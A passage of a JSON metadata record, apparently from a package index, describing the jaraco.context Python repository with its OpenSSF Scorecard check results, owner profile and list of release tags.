py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://co